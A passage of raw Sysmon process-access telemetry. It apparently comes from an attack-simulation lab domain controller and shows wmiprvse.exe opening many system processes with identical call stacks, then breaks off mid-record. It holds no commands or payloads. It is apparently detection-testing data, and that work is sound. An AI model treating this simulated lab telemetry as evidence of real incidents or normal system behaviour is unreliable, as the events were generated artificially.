Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.928{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028266Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 